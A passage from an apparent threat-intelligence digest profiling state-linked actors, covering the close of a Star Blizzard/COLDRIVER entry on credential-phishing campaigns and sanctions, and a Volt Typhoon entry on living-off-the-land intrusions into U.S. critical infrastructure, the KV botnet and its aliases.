affiliated with the intended target; using compromised or lookalike accounts; and sending highly personalized phishing emails aligned to the victim’s professional context. In the documented "River of Phish" activity, the group used fake protected or encrypted PDF lures, sometimes omitting the attachment in an initial email to induce a reply before sending the lure. The PDFs directed victims to attacker-controlled infrastructure that fingerprinted the victim’s browser and system, optionally presented hCaptcha, and redirected to phishing pages impersonating Gmail or ProtonMail. The objective was credential theft, including passwords, 2FA codes, and session cookies, enabling account takeover. 
The content also states the group incorporated the Evilginx framework into spear-phishing activity and used JavaScript to redirect victims from adversary-controlled servers to Evilginx-hosted phishing infrastructure. Additional reporting in the content states Star Blizzard has uploaded malicious payloads to cloud storage sites and has sent emails with malicious PDF files to deliver malware. Google TAG reporting referenced in the content notes Microsoft uncovered a similar QR-code campaign tied to Callisto Group / Coldriver / Star Blizzard that targeted WhatsApp accounts linked to dozens of civil society organizations and journalists. The group has also been linked to hack-and-leak activity. The content states information stolen by COLDRIVER was used in hack-and-leak operations, including leaks related to UK-US trade documents ahead of the 2019 UK election and material used in 2022 to exacerbate Brexit-related political divisions in the United Kingdom. Law-enforcement and sanctions actions described in the content include U.S. and UK sanctions against Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets as members or associates of the group, and U.S. Department of Justice and Microsoft actions to seize more than 100 domains allegedly used in the group’s spear-phishing infrastructure.

Mentions: 4 · Origin: RU
#24 Volt Typhoon

Volt Typhoon is a China-linked, state-sponsored threat actor focused on stealthy intrusion and long-term access in critical infrastructure environments. The content describes the group as targeting largely U.S. critical national infrastructure, including communications, energy, water, wastewater, and transportation systems, and specifically notes intrusions into water and wastewater IT environments across multiple U.S. critical sectors. Its objective is characterized as strategic positioning and prepositioning for potential future disruption during a crisis rather than immediate visible effects. The actor is described as relying heavily on living-off-the-land tradecraft, using victim-owned tools, systems, and credentials rather than deploying conventional malware, which makes detection difficult for SIEM and SOC teams. The content also links Volt Typhoon to the KV botnet and states that China-linked operators used compromised end-of-life SOHO routers, including Cisco and NetGear devices, to conceal access. One cited operation notes that in December 2023 the FBI disrupted KV-botnet malware from hundreds of U.S. SOHO routers that Volt Typhoon was using as relay infrastructure. A restricted WaterISAC notice title further indicates an IOC associated with Volt Typhoon performing network enumeration on Utah infrastructure. The content explicitly associates Volt Typhoon with techniques including PowerShell execution (T1059.001), exploitation for privilege escalation (T1068), and multi-hop proxying (T1090.003). It also states that the group has operated in this living-off-the-land manner for over five years. Aliases directly mentioned in the content include BRONZE SILHOUETTE, DEV-0391, Insidious Taurus, Storm-0391, UNC3236, Vanguard Panda, VOLTZITE, and G1017. 
The content also places Volt Typhoon alongside other Chinese state-sponsored campaigns such as Salt Typhoon and Flax Typhoon as examples of operations supported by a broader commercial ecosystem of private firms, contractors, and botnet infrastructure.

Mentions: 4 · Origin: CN